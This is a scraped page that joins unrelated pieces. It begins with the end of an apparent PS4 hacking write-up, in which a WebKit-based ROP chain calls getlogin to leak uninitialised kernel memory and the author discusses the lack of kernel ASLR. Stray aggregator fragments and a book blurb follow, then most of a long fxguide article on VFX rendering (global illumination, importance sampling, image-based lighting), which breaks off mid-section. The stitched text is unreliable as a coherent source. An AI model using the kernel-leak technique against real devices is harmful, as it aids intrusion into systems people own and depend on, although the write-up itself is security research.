    The getlogin system call is intended to copy the login name of the current session to userland memory, however, due to a bug, the whole buffer is always copied, and not just the size of the name string. This means that we can read some uninitialised data from the kernel, which might be of some use.

    Note that the system call (49) is actually int getlogin_r(char *name, int len); and not char *getlogin(void);.

    So, let’s try copying some kernel memory into an unused part of userland memory:

    chain.syscall("getlogin", 49, chain.data, 17);

    Unfortunately 17 bytes is the most data we can get, since:

    Login names are limited to MAXLOGNAME (from <sys/param.h>) characters, currently 17 including null.

    After executing the chain, the return value was 0, which means that the system call worked! An excellent start. Now let’s take a look at the memory which we pointed to:

    Before executing the chain:

    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00

    After executing the chain:

    72 6f 6f 74 00 fe ff ff 08 62 61 82 ff ff ff ff
    00

    After decoding the first 4 bytes as ASCII:

    root

    So the browser is executed as root! That was unexpected.

    But more interestingly, the memory leaked looks like a pointer to something in the kernel, which is always the same each time the chain is run; this is evidence to support Yifanlu’s claims that the PS4 has no Kernel ASLR!

    Summary

    From the information currently available, the PS4’s kernel seems to be very similar to the stock FreeBSD 9.0 kernel.

    Importantly, the differences that are present appear to be from standard kernel configuration changes (such as disabling SCTP sockets), rather than from modified code. Sony have also added several of their own custom system calls to the kernel, but apart from this, the rest of the kernel seems fairly untouched.

    In this respect, I’m inclined to believe that the PS4 shares most of the same juicy vulnerabilities as FreeBSD 9.0’s kernel!

    Unfortunately, most kernel exploits cannot be triggered from the WebKit entry point that we currently have due to sandboxing constraints (likely to be just stock FreeBSD jails).

    And with FreeBSD 10 being out, it’s unlikely that anyone is stashing away any private exploits for FreeBSD 9, so unless a new one is suddenly released, we’re stuck with what is currently available.

    The best approach from here seems to be reverse engineering all of the modules which can be dumped, in order to document as many of Sony’s custom system calls as possible; I have a hunch that we will have more luck targeting these, than the standard FreeBSD system calls.

    Recently Jaicrab has discovered two UART ports on the PS4 which shows us that there are hardware hackers interested in the PS4. Although the role of hardware hackers has traditionally been to dump the RAM of a system, like with the DSi, which we can already do thanks to the WebKit exploit, there’s also the possibility of a hardware triggered kernel vulnerability being found, like geohot’s original PS3 hypervisor hack. It remains most likely that a kernel exploit will be found on the PS4 through system call vulnerabilities though.

    Thanks

    • flatz
    • SKFU
    • droogie
    • Xerpi
    • bigboss
    • Hunger
    • Takezo
    • Proxima
    展开全文
  • "One of the most basic laws of a web application is that the client, not the server, must initiate any communication between the two....With this book, be a part of the next generation, Ajax 2.0.
  • The State of Rendering – Part 1

    千次阅读 2014-09-22 16:15:31
    This part deals with the rendering trends in the VFX industry today. Part 2 includes a run down of 14 of the most popular renderers for VFX. Many of the issues in this special two part

    Part 1 of 2. This part deals with the rendering trends in the VFX industry today. Part 2 includes a run down of 14 of the most popular renderers for VFX. Many of the issues in this special two part series will also be covered in more depth in the July term at fxphd.com.

    Introduction: which renderer?

    ilmEach Tuesday at ILM in the Presidio in San Francisco at the former military base on the northern tip of the San Francisco Peninsula overlooking the Golden Gate Bridge there is a lunch for all the ILM visual effects supervisors. It is a private lunch where they get to discuss anything and everything. ILM has an incredible wealth of visual effects supervisors with an astonishing collection of both Oscars and technical landmark innovations. “It is great. It is one of the great things about the company,” says supervisor Ben Snow.

    Rendering often comes up in conversations. While that may not be a topic most directors focus on, it is these people and their respective leads on projects who must decide how they will achieve the incredible shots they bid, often with unparalleled realism on ever tighter budgets. ILM has a full site license of RenderMan and for many years primarily used it as their renderer, especially on creature work. But, as Snow explains, “we have had a lot of discussion at the supervisor level that we want to be renderer agnostic. If someone wants to use Arnold they should be able to. If I want to use RenderMan I should be able to.”

    Pacific Rim rendered in Arnold at ILM

    Pacific Rim. This shot rendered in Arnold at ILM.

    ILM is not alone in seeing rendering as something in need of constant evaluation and far from a simple solution. Right now, ILM alone uses a range of renders from Arnold to RenderMan to V-Ray to newer tools like Modo.

    As Snow described to fxguide, he had told the team at Pixar earlier that day, “I am old school ILM – and we were RenderMan people – almost RenderMan chauvinist actually. So I have always been a little bit biased towards them. On Pearl Harbor where we thought GI was the answer we worked hard to try and get it to work in Mental Ray and on Iron Man we looked at Mental Ray, to see if we could match the suits when shared with another vendor.” In the end they used RenderMan.

    Star Trek Into Darkness Rendered in Arnold at ILM

    Star Trek: Into Darkness. This image rendered in Arnold at ILM.

    “All renderers have strengths and weaknesses and different departments here at ILM use different renderers,” adds Snow. “Arnold became the next big thing and we were looking at that on the last few shows. But I have to say on the last few films we have really been jumping around on renderers. And in each case we have been porting the shader set between the renderers.” For example, Arnold was used on Star Trek: Into Darkness, Pacific Rimand The Lone Ranger this year at ILM, along with other renderers.


    While RenderMan is the ‘gold standard’ by which other production renderers are judged, Arnold has certainly got the reputation as perhaps the fastest production renderer for many styles of projects – a point made to fxguide by not one but several of their competitors.

    People can be very religious about their renderers!

      Mark Elendt
      Mantra, Side Effects Software

    But beyond these two big players, there is an amazing number of production renderers and people are very passionate about which they prefer. And many of these other renderers are exceptionally good. V-Ray has been even more widely embraced than Arnold for its quality speed and more open community approach. Most people agree that Maxwell can often be used as a ground truth because of its dedicated light simulator approach and incredible accuracy. Once upon a time the renderers that shipped with applications were only used by those who could do no better, but Mantra and Modo’s renderer, for example, have gained real acceptance in their own right. And there are a host of newer renderers, some challenging GPU v CPU, others completely cloud based and no longer even rendering previews from the desktop.

    An advanced Maxwell Render showing  caustics

    An advanced Maxwell Render showing caustics.

    In this article – a follow-up to fxguide’s extraordinarily popular Art of Rendering piece – we explore the state of play with renderers in the visual effects and animation fields. Part 1 provides background on the issues of the day, while Part 2 highlights each major renderer in some detail based on interviews done exclusively with each company. We also take a brief look at the future and question if the whole approach is not flawed?


    1. Issues of the day

    “Each pixel is just a single color but to come up with that color you have to look at the entirety of the environment.”

      Rob Cook
      Pixar RenderMan co-founder

    In this first section we highlight the primary issues in the area of rendering. This year, RenderMan celebrates 25 years and (fxguide has a special feature on the history of RenderMan coming up). Rob Cook, co-architect and author of Pixar’s RenderMan, described rendering to fxguide as “each pixel (on the screen) is just a single color but to come up with that color you have to look at the entirety of the environment inside that pixel.”

    Cook published in 1984 a key ray tracing paper that set up the idea of randomly sampling to reduce aliasing and artifacts. The paper is one of the landmark advances in ray tracing, and when the RenderMan spec was first published it accommodated ray tracing as a possible render solution. This is remarkable given that for many years Pixar’s own PRman implementation would not use ray tracing as it was considered far too computationally expensive and yet today – nearly 29 years after Cook’s paper – Pixar’s Monsters Universitywas fully ray traced and using at its core the principles of that paper.

    The rendering equation was presented by James Kajiya in 1986. Path tracing was introduced as an algorithm to find a numerical solution or approximation to the integral of the rendering equation. A decade later, Lafortune suggested many refinements, including bidirectional path tracing. Metropolis light transport, a method of perturbing previously found paths in order to increase performance for difficult scenes, was introduced in 1997 by Eric Veach and Leonidas J. Guibas.

    The original rendering equation of Kajiya adheres to three particular principles of optics:

    1. the principle of global illumination,
    2. the principle of equivalence (reflected light is equivalent to emitted light), and
    3. the principle of direction (reflected light and scattered light have a direction).

    From informally surveying the industry, fxguide has identified some of the key trends in the following areas:

    1.1. GI
    1.2 Ray Tracing vs point solutions
    1.3 Image-based Lighting
    1.4 Interactivity
    1.5 GPU
    1.6 Farm and cloud rendering
    1.7 Open source


    1.1 GI

    While there is a great amount of work being done in non-realistic rendering, especially in Japan, the overwhelming trend is to more realistic rendering. This means rendering with global illumination and providing images with bounce light, color bleeding, real world light samples, and – increasingly – the use of physically plausible shaders and lights.

    The most widely used methods for GI are distribution ray tracing, path tracing, and point-based global illumination. Each of these has their advantages and limitations, both from a technical point of view and from the complexity they force upon the lighting artist or TD setting up the shot.

    Monsters University Rendered in RenderMan at PIXAR Studios

    Monsters University: rendered in RenderMan by Pixar.

    The first use of global illumination as noted in a recent paper (Multiresolution Radiosity Caching for Efficient Preview and Final Quality Global Illumination in Movies 2012 Per H. Christensen et al.) in a feature-length movie was for the movieShrek 2. Here, PDI/DreamWorks computed direct illumination and stored it as 2D texture maps on the surfaces, and then used distribution ray tracing to compute single-bounce global illumination.


    As the paper points out the use of 2D textures requires the various surfaces in the scene to be parameterized. “The irradiance atlas method is similar, but uses 3D texture maps (“brick maps”) so the surfaces do not need a 2D parameterization. Both methods use two passes: one pass to compute the direct illumination and store it (as 2D or 3D texture maps), and one pass for final rendering.” Irradiance maps are baked and not generated per frame as Sam Assadian from Clarisse iFX points out. “Irradiance maps flicker with low frequency noise – the worse kind.” By rendering once and storing the value, rendering is faster overall and consistent over time (temporally stable).

    Path tracing is a form of ray tracing and it is a brute-force unbiased global illumination method that was first seen via the Arnold render in Monster House from Sony Pictures Animation. The advantages of path tracing are that it does not use complex shaders nearly as much as a biased or point cloud approach. Given the way a path tracer renders it can provide fast feedback during interactive lighting design. The problem with all ray tracers is noise. At the basic level to halve the noise you need to quadruple the number of rays. The promise, mathematically, of unbiased ray tracing is that given enough rays it will converge to a correct solution. Ray tracing is built on probability and if you fire enough rays, instead of sampling and estimating the result, the variance is reduced to 0, and the solution converges to the correct result. Of course, firing an infinite or extremely large number of complex rays is not viable especially with the nonlinear noise curve, so one has only three options:

    • use a different clever solution – like brick maps and say a scan line renderer or a partial ray tracing solution

    • write really fast and clever code that renders very quickly i.e. fast clever rays

    • aim the majority of your rays where they matter the most i.e. aim those fast clever rays better

    At the core of the ray tracing scheme is the notion of solving a lighting problem using samples, normally random samples decided by a probability distribution function, but to get GI, you also need to think about what other rays are fired off due to the material (the shader/BRDF etc) and how you sample the lights, or rather things that will contribute light. From on set we all know you can light with a bounce card, so to catch every object in a scene bounce light, and the biggest example of this is lighting with a giant light dome or what is known as image based lighting. In image based lighting a dome or sphere is mapped with an image, normally a HDR image. The whole dome or sphere contributes light to everything inside it, which is again why sampling this giant massive spherical light sensibly is important. After all we are trying to do nothing less than recreate the world in all its lighting complexity and how every part of it affects every other part of it.

    Like any sphere it is easy to think that there is energy bouncing around in the form of light, which should all add up. In other words if a light bounces off a table the bounce light would never be more than the light coming from the light source, and if one moves the light further away, then the bounce would not only seem less strong, it would actually reduce according to the inverse square law. We all know this from moving any light in the real world. This idea of correct light behavior and correct material behavior is what is being referred to in “physically plausible lighting and shaders”. (For this article we will use the more relaxed term physical lighting and physical shaders, but they are of course nearly always just a very close approximation).

    Do you have to use ray tracing and physical lights and shaders? Absolutely not.

    Millions of frames of animation and effects have been produced without either, but the trend is towards both, not for everything, but in the world of VFX and animation it is the dominant trend. We will try and highlight non-ray tracing solutions, and there are many, but the state of the art today is centered around a “rays race” to produce better results, that are easier to light and yet do not explode memory and render budgets.

    GI Joe 2 Rendered in V-Ray at ILM

    GI Joe: Retaliation. This image rendered in V-Ray at ILM.

    One of the biggest disadvantages of ray tracing is its memory requirements. One of the remarkable historical aspects is that RenderMan, so as to beat the RAM budget of 25 years ago and allow anything to be rendered of any complexity, still today contains both a REYES scan line renderer and a ray hider. RenderMan is remarkable in not only its successful history but the sheer success of its foundering scientist vision to be able to define a spec – an approach that could still be valid today, and would be as forward looking at it was. We will cover some of that history below but today RenderMan stands alongside Arnold, V-Ray, Maxwell, and newer programs like the cloud based Lagoa and the GPU Octance renderers as a program that is trying to render faster and more accurate ray traced images to an ever competitive environment.

    Maxwell render with SSS

    Maxwell Render with SSS.

    How competitive? Since we wrote the first Art of Rendering story, just 18 months ago, the landscape has changed dramatically. New renderers and whole new approaches have been released. There have been dramatic improvements, renderers have died, others have been bought, and there is no sense that the process is anywhere near over. Rendering, once a fairly predictable evolutionary space, has become like a quickly moving landscape. For this story alone we have done over 20 interviews and we will be covering 14 major production rendering platforms. We have aimed to focus on production renderers for animation and VFX and not even really touch on game engine rendering, GPU rendering and mobile offerings. Art of Rendering saw many compliments but also a host of complaints. To paraphrase a quote from the first article, “rendering is now a bit like a religion.”


    1.2 Ray tracing vs point solutions

    Ray tracing is only one approach to GI and its main rival is point-based global illumination. Actually the terms are confusing as strictly speaking one can have a non-fully ray traced solution that still involves some firing of rays. But for now let’s consider ‘ray tracing’ to mean fully unbiased ray tracing or path tracing.

    Before discussing ray tracing it is important to understand how point based GI works, as many solutions in the real world use a combination of results. For example, in Pixar’s latest feature Monsters University, the film moved to primarily ray tracing and physically based lighting and shading, but still for the sub surface scattering (SSS) it used a point based solution (although that will not be true of the next Pixar feature). SSS is the way light softens beneath the skin as especially the red light wavelengths scatter and produce the waxy look of skin vs the flat look of plastic. SSS is key to character animation and is not new – for example, Joe Letteri (senior VFX supervisor Weta Digital) used it extensively in the original Lord of the Rings films (see this 2004 fxg interview) and it was key to the original ground breaking look of Gollum. But SSS is very expensive and hard to achieve in a brute force ray tracer, but very achievable using a point source solution.

    00:00 | 00:00

    Weta Digital’s Joe Letteri talks to fxguide about the advent of physically based lighting and rendering at his studio.

    Point-based GI is relatively new in its own right and it is fast. Plus, unlike ray tracing, it produces noise-free results. “It was first used on the movies Pirates of the Caribbean 2 and Surf’s Up, and has since been used for more than 40 other feature films” (2012 Per H. Christensen et al.)

    Point-based GI is a multi-pass method:

    • In the first pass, a point cloud is generated from directly illuminated micropolygons
    • In the second pass, n−1 bounces of GI are computed for the point cloud. (The 2nd pass can be skipped if only a single bounce is needed)
    • In the third pass, the indirect illumination from the point cloud is computed and rendered

    Due to its multi-pass nature, a point-based method is not suitable for interactive lighting design. The latest version of this approach from Pixar is outlined in the 2012 Per H Chistensen paper. It is based on storing post-shading radiosity values from grids of micropolygon vertices. By caching the radiosity, the Pixar team captured and reused both direct and indirect illumination and reduced the number of shader evaluations. By shading a grid of points together rather than shading individual points, their approach was suitable for a REYES-style SIMD shader execution (non-ray traced in other words).  The authors noted that their method was similar to Greg Ward’s irradiance cache approach, Greg Ward being a true pioneer in many areas of radiosity and HDRs (see our fxg Art of HDR story from 2005).

    At the time of beginning MU, Pixar had been planning on doing a non-full ray traced solution, the problem being that ray traced GI in production meant MU scenes with huge geometry and complex shaders. At Pixar the team saw the bottleneck not as the ‘raw’ ray tracing time, but the time spent evaluating:

    • the displacement,
    • light source, and
    • surface shaders at the ray hit points. Note: the shader evaluation time includes texture map lookups, procedural texture generation, shadow calculation, BRDF evaluation, shader set-up and execution overhead, calls to external plug-ins, etc.

    The point solution meant “we reduce this time by separating out the view-independent shader component — radiosity — needed for global illumination and caching it. During distribution ray tracing global illumination these radiosities are computed on demand and reused many times. As a by-product of caching these shading results, the number of shadow rays is reduced.”

    The radiosity cache is implemented in Pixar’s PhotoRealistic RenderMan renderer that supports both progressive ray tracing and REYES-style micropolygon rendering. The cache contains multiple resolutions of the radiosity on the surface patches in the scene.

    “The resulting single-pass global illumination method is fast and flexible enough to be used in movie production, both for interactive material and lighting design and for final rendering. Radiosity
    caching gives speed-ups of 3x to 12x for simple scenes and more than 30x for production scenes,” the 2012 paper quotes. Indeed, at last year’s 2012 RenderMan User Group, incredibly impressive comparisons were shown between early approaches and the new RenderMan approaches.

    So why try and go to ray tracing? If other clever methods are able to produce orders of magnitude faster results – why even explore fully ray traced solutions and how can ray tracing be made to render as fast as possible? What is even more interesting is that even for Pixar’s own MU, the point solution was only used on SSS (with a method that used Jensen’s now famous dipole (or version of) solution which models SSS as diffusion – look at a given point is the integral over the surface of the product of a diffusion kernel and the irradiance (incident illumination) on the surface). Why did Pixar even go near fully ray traced on MU?

    1.2.1. Physically Plausible Lighting and Shading

    arnoldteapotThe overriding trend at the moment is to move to a physically based shading and lighting model. Marcos Fajardo of Solid Angle – the company behind Arnold – remarked that every (production) studio in the world has moved over to being able to work this way or is in the process of moving now. “That is happening right across the industry, ever single company you talk to is either in the middle of it or has already moved, and this is something I have been working towards for the last ten years or so, so I am really happy to see that happening – finally.” Fajardo should be credited as one of the greatest advocates and enablers of this massive shift in the industry. Solid Angle is very much at the forefront of the industry-wide move to path traced GI with physically plausible lighting and shading in a production environment (meaning in a cost effective way with ever tighter schedules).

    Central to the popularity of path traced unbiased ray tracing is the desire to just make life similar for the lighting artists while making the pictures even more realistic.

    In some old pipelines an artist could be handed a set up with a few hundred lights, plus extremely complex shaders – which are their own C ++ code-style clever box of tricks to pull off what was needed. Lighters would sometimes just have to sit and turn on and off lights to just work out what everything was doing.

    Most companies would not claim that implementing physical lights and shaders made the rendering faster per say, but quite a few companies believe it makes the artist’s role much easier and frankly artist hours are more expensive than render hours by several orders of magnitude.

    Image from Iron Man 2.

     

     

    But the energy conservation and physical lights and shaders are not just the limit of path tracing new renderers. ILM adopted this approach some time ago with Iron Man 2. (See our lengthy interview with ILM’s Ben Snow from 2011).


    From that story the process actually started in the film before Iron Man 2 – it started on Terminator: Salvation:

    Terminator used a new more normalized lighting tool, not on every shot but on a couple of big hero sequences. The move to the new tool did spark somewhat of a holy war at ILM. Many of the team were happy with the tools and tricks that they had, and in fairness were using very effectively. So in the end the approach on Terminator was a hybrid and many of the cheat tools that artists knew and loved were enabled so that people could still use those tools on the film, and tweak lights in a way that was not physically correct.

    The team at ILM implemented for Iron Man 2 a system of energy conservation:

    The new system uses energy conservation which means that lights behave much more like real world lights. This means that the amount of light that reflects or bounces off a surface can never be more than the amount of light hitting the surface.

    For example, in the traditional world of CG the notion of specular highlights and reflection were separate controls and concepts, as were diffuse and ambient light controls. So under the previous model if you had three lights pointing down (three beams one from each spot to a surface below), if the specsize is varied, the specular from the point light doesn’t get darker as the specsize increases. “Indeed this is the specular model we have been using for years at ILM actually gets much brighter with grazing angles so the actual specular values are very hard to predict,” says Snow.


    Old lighting tool (ILM)

    Energy conservation tool (ILM)


    Under the new energy conservation system, the normalized specular function behaves in the same way that a reflection does. As the specsize increases, the intensity of the specular goes down. Previously the system required the artist to know this and dial down the specular as the highlight got broader. While a good artist would know to do this, it had to be dialed in in look development, but different materials on the same model might behave differently, and of course objects would behave differently in different lighting environments and would have to be hand tweaked in each setup.

    This ground breaking work started a fire that has spread throughout the industry. Now entire rendering systems are being set up that allow only for physically based lighting and shading.

    But the system did something else, it accelerated the work ILM was doing with IBL. See below.

    1.2.2. Importance sampling and multiple importance sampling (MIS)

    If you do move to a system of ray tracing from above, one of the key things to be doing is as we stated “aiming those fast clever rays better.” But what does that mean?

    Given that a large number of rays are going to be needed to solve some parts of the scene successfully, it is ideal to increase sampling where and when you need it while not wasting effort where you don’t. This is the art of importance sampling, (IS) as the name implies – sampling where it is important.

    There are four levels of IS at the moment in the industry:

    1. undirected brute force renderers which do not have IS 
    2. renderers that have it for just say environment lights or dome lights: environment sampling eg. Modo
    3. renderers that have it for both lights and materials and intelligently balance the two: multiple importance sampling (MIS) – this could arguably be considered ‘state of the art’, eg RenderMan
    4. advanced MIS – applying IS to a range of other solutions as well such as SSS eg. Arnold

    The concept of MIS is not new. Eric Veach first discussed it in his Ph.D. dissertation, Stanford University, December 1997. This was followed by a key SIGGRAPH presentation the next year. So key is this work that Arnold founder Marcos Fajardo says he re-reads it every year or two, “…and ever since he published it, every single researcher has been reading that thesis – which is amazing by the way,” points out Fajardo. Veach’s understand of rendering is so deep and what is all the more remarkable is its 1997 publication date (as an aside, Veach went on to Google to develop algorithms for Adsense and made millions of dollars according to Fajardo who could not be more happy to see Veach rewarded).

    Key implementations of this ground breaking MIS work in the current renderers environment has been done by Christophe Hery while at ILM with Simon Premoze (who was a research engineer at ILM, then at Dneg until recently). Premoze has since done courses at SIGGRAPH and MIS has become a critical part of rendering with ray tracing.

    Christophe Hery implemented the MIS used on MU and it worked off a Power 2 formula also from Veach’s original Ph.D. Interestingly, this is one of the few occasions in recent times where the software used by Pixar  was slightly out of step with the public RenderMan. Far from this being a deliberate withholding, it seems Pixar almost over ran the RenderMan team’s schedule of implementation, but this is now getting back in sync, such was the dramatic nature of the adjustment to the new approach. (You can learn more about the physically plausible shaders in MU in our 2013 fxguide article here).

    To understand the power of MIS one need only refer to the original Veach doctorate – which is still as relevant today.

    Below is a picture from that paper showing on the left the IS favoring the materials of BRDF samples, on the right it favors the lights in terms of sampling. There are 5 lights in both shots which are the same set-up apart from the IS settings. The fire lights are 4 lights at the back of shot and one overhead to just see what is in our space. If we ignore the top light – the back 4 lights are all of equal energy – so as the size of the light gets bigger – it appears to dull from bright white. In front are 4 panels angled to reflect the lights behind. The back panel is glossy, the front panel is much more diffuse.

     veach


    Notice how when favoring the BSDF the tiny point light on the left is poorly sampled and thus on the rough bottom plane on the bottom left it is very noisy, but in the same BSDF the light on the right is reflected well – as it is big and easily reflected from the higher sampling on the material. By contrast, if we favor the light sampling, then the rough surface produces a nice spread out light effect from the hot tiny light, but the big light on the right is very noisy. Clearly we want to sometimes favor the BRDF (BSDF) and sometimes the lights – it depends on how diffuse the surface is and how big the lights are.

    Thankfully this is exactly what MIS does. So much so it is hard to replicate this result with some modern renderers since the latest version of RenderMan virtually restrains one from making the render this bad (by using MIS), similarly in Arnold, but you can get close my manually adjusting setting in V-Ray (this is not to say V-Ray is in any way inferior – far from it – but all renderers aim to not produce such noisy clearly ‘wrong’ renders).

    Amid Rajabi produced this version below for fxguide in V-Ray by manipulating both the light/BRDF samples and V-Ray’s adaptive DMC (Deterministic Monte Carlo Sampling).

    amid


    The results are easy to see in even the small form shown in the article but if you click on the image above and look at the larger version – the difference is even easier to see.

    (Note: due to the clipping of an 8 bit image the 4 key lights ‘appear’ to be the same brightness no matter their size but in the floating point render output they fall off in value as they get bigger in size along the back of each of these images.)

    Here is an example of the difference using importance sampling inside Otoy’s Octane GPU renderer.

    src="http://www.youtube.com/embed/OJ-N9_5lDEE" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Rendered in real-time with OctaneRender standalone 1.20 on 1 GTX 680 + 1 GTX Titan using path traced sub surface scattering. Head model scanned with LightStage, containing over 17M triangles.


    1.3 Image-based lighting

    Started a while ago with a combination of new on-set light probe sampling and various dome lights, there has been real growth in the use of IBL with physically based lighting and shading.

    In MU, not only did the animation unit of Pixar move to physical lights and shaders, they also used IBL lighting, which is perhaps odd as it historically has been used for sampling real world ‘on location’ lighting and using it to match CG elements into that location.

    1.3.1 Pixar MU experience – and Splat

    fxguide recently interviewed Christophe Hery, Global Tech and Research TD, at Pixar aboutMonsters University and the IBL tools they developed, as he was a key part of the team that moved Pixar to a near fully ray traced, physically based shader and lighting solution – which used IBLs. In addition to the comments in that original story, Hery discussed the new Splat tool with us.

    Monsters University Rendered in RenderMan at PIXAR Studios

    Monsters University: rendered in RenderMan at Pixar.

    To handle MU, the team at Pixar created some new tools, such as a tool to paint on a lighting dome. “So not only could you shoot IBLs that were physical to start with, but if you wanted to you could enhance it or come back with something with more kick on it, you could use “Splats”. This tool allows for interactive feedback of painting on the IBL dome while seeing the output. This is an oriented IBL interactive fast paint system for the lighters to not only vary real maps but just create IBLs from scratch. “It was an artistic way of creating IBLs,” he explains, “after all – at Pixar all the shots we were creating were all synthetic – there was no ‘plate’ photography.” Initially, Hery shot real IBLs to just help with look development. “I was not expecting to use IBL at all during shot production, but they liked it so much (the TDs) that they asked us to create this interface where they could artistically paint and have this arbitrary input to the texture/process but have feedback on it,” he explains. “They were literally in some cases – starting from scratch starting from the black texture and artistically painting this is where I want this diffuse luminosity here, I want a higher more intense source of light.” At times the team took some complete liberty in shot lighting and what it means to use an IBL, using tools built for matching to live action and just using them to paint with light to illuminate the inhabitants of MU. Of course the IBL would work in conjunction with what was in the scene. The IBL would inform the lighting but any character would still be lit by bounce off whatever they were standing on, just as they would if the IBL was a photographic HDR reference real image. The actual painting was not a flattening of the dome to a rectangle but rather a regionalized surround that understood color and exposure, and then create an image – with near real time feedback.

    Each of the lights in the scene were also able to be textured, each light had a profile and a cosine power to shape the angular emission of the light. Plus ‘barn doors’ or slight projections. The barn doors on the PixarMU lights allowed even more barn door control than is possible in the real world, “but we tried to not break physics on the way,” says Hery, “we always tried to work in a way that could preserve some of the things from before that they wanted (in terms of interaction and UI) but we did not necessarily have to encode them in such as way that would jeopardize the whole system.” The R&D team found new analogies and new ways to present familiar tools in a physically plausible way. “That worked really well and they were very happy.”

    1.3.2 The Great Gatsby experience

    Animal Logic on The Great Gatsby (2013) produced their own unique pipeline that involved their own code and RenderMan. We spoke to Matt Estela, the lighting lead from Animal Logic, Australia’s premier film, animation and visual effects studio.

    For Gatsby the team used Animal’s own pipeline with a path tracer within PRman. AL worked with RenderMan as they had many tools from a long history with the product, an experience other facilities have also echoed. Estela joked at a recent Autodesk event that their job was to “Make it look real, Make it look cool and Make it render on time.”

    A common solution, especially for exteriors, started with a combination of an environment light and a key light. Estela explains that the environment light provides realism, soft shadows and overall tonality but it is also the most expensive light to use. “It is is a bit like a dome light in Mental Ray,” he adds.

    Final shot.

    Final  render and comp by Animal Logic (The Great Gatsby).

    The use of this approach produced great results but it did not come without some effort. The two key problems ere render times to get renders with satisfactory low noise, and memory use. “Our old system could render using 8 gig, our new system used 64 gigs of RAM, and we could easily put ‘em into swap.” Still the team managed very successfully to migrate to the new approach of physical shaders and lighting and used IBL for both technical and artistic success.

    Fresh from working on The Great Gatsby,  Estela walked fxguide through a worked example of how he creatively lights with an IBL using a test set-up.


     

    00_keylight_onlyFigure 1:

    On the left is a simple test scene with 2 cats, and a robot. It has soft shapes and hard edged geometry.

    On the extreme left there is a chrome sphere at the top, and a diffuse sphere beneath it, for context. At this stage the scene is lit with a single distant light simulating the sun. It has shadows, but it is missing fill light.


    00a_ambocc

    Figure 2:

    If we relight with just effectively a large white environment light (or dome/IBL white ball). The image now becomes effectively an ambient occlusion pass.

    Note: the single distance light is off from Figure 1.


    01_env_onlyFigure 3:

    The scene is now lit with an example HDRI, and it is mapped into the env light (the photo in the middle is that hdr mapped onto a plane so you can see what the HDR is – as a preview). This is more realistic but not production quality.

    Note: the shadows are coming from the ‘sun’ in the HDR. The environment light is the only light source in this image.


    02_remove_groundFigure 4:

    The env light is now edited. Note the brown ground has been painted out. The correct ground bounce light should be from what the figures are standing on. If you compare the last two images you can see some warm bounce on the back of the robots leg, (we need to remove that).

    Note: this may not be needed in practice if the env light was just a 180 dome, or the ground plane 3D element they are standing on blocked that light, but here we are painting on the HDR to illustrate the point.


     

    03_remove_sunFigure 5:

    The sun is now painted out of the HDR. Unless the HDR is very carefully captured – there will be some clipping on the real sun in the HDR, and some renderers can’t handle that amount of dynamic range in an HDRI without creating noise or fireflies (or black dots).  Creatively it is also good to be able to move the sun without rotating the env light.

    We now we have a basic map to start working with.


    03a_grade_areas-1

    Figure 6:

    Sometimes a temp colour map is used to better understand which are the interesting areas of the HDR. Green is the area around the sun (imagine the hazy light area that extends around the sun on an average sunny day, its usually much MUCH wider than the sun itself), blue to represent the sky low to the horizon, a darker blue at the back of the map for the region facing away from the sun, red for overhead, and yellow for the small area directly overhead. This helps the TD or lighter understand what they are working with.


    04_graded_sun_disc

    Figure 7:

    In Dailies in production, the issue of ‘shape’ + warm vs cool often comes up in the context of finding nice modelling detail in the assets and wanting to enhance them or possibly avoid the ‘hero’ from looking ‘flat’. Color is used to have a sense of separation. Shapes that face the sun here have warmer tones, while the parts facing away, have cooler tones. Here the green zone from the previous image, has been converted it into a soft sun area, and tinted in that area of the map to a warmer yellow. This gives the warm/cool separation often desired, & a more interesting shape.


     

    06_shape_front_to_backFigure 8:

    Here I’ve used the blue and red zones (blue being sky near the horizon, red being the sky region a big higher), and set my sky colour to a more desaturated blue. A clear blue sky IS blue, but you rarely perceive gray objects as blue in real life. your eyes naturally white balance to remove the blue cast, and cameras will normally be adjusted to do the same. in a cg lighting context, you’d be looking at neutral objects in the live action plate (or a gray ball that’s been shot on location if you’re lucky), and making sure your environment light tints your cg objects to match. i’ve also used the region that faces away from the sun, and exposed it down. comparing to previous, it has the effect of slightly darkening shapes away from the sun, giving a little more shape again.


    07_toplight

    Figure 9:

    Here’s a trick from Etienne Marc, one of the senior lighters on Great Gatsby at Animal Logic. Here we have added a thin, high intensity stripe of white across the top of the HDR. This adds a little more top light across the top of objects, but more usefully, sharpens their contact shadows, making everything feel a little more grounded. If you click on the image and toggle between this and the previous slide, you can see how the ground contact shadows are more defined. “‘The CG feels like it’s floating’ is a regular comment in lighting reviews, this helps avoid it.”


     

    09_add_keylightFigure 10:

    Finally the key light is turned back on, and balanced between the key light against the environment light. The shading is now much more interesting, but still grounded in realism. There is a solid base for a keylight now, now with more indirect / bounce light form other objects and final materials, the shot is well on the way for a nice looking shot.


    Below is a before and after reel from The Great Gatsby, showing the great work of Animal Logic (primary vendor) in producing realistic and stylized lighting. The other vfx houses involved on the film were Rising Sun Pictures, Iloura, ILM, Prime Focus and Method Vancouver). The overall supervisor was Chris Godfrey.


    src="http://player.vimeo.com/video/68451324?title=0&byline=0&portrait=0&color=f24f46" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">


    1.3.3. The ILM Experience

    As mentioned above, ILM’s early work moved beyond just energy conservation. Their work with IBL also broke new ground and allowed Tony Stark’s Iron Man to look incredibly real.

    We again spoke with ILM visual effects supervisor Ben Snow, who is currently working on Noah for Black Swan director Darren Aronofsky. (source: IMDBPro).

    Outside:

    “I am working on a show now with a lot of exteriors and using IBL does help you get just a great first take,” says Snow, but the four time Oscar nominee also points out that, “you then of course have to go in and look at it like a DP.”

    While the IBL on exteriors will match with the dome or environment light at infinity, Snow goes on to say that “if I am out there shooting with a DP, with an actor, and they have the sun and they orientate the actor to the sun, they also can add a bounce card or a skrim or a silk to mute the sun and I don’t know we are fully there yet with that technology, but that’s where I want to be – I want to have the equivalent of what they have out there.” A DOP will light any character even normally on a seemingly simple wide open exterior shot – controlling contrast ratios and top light with the bounce cards and silks Snow refers to.

    Inside:

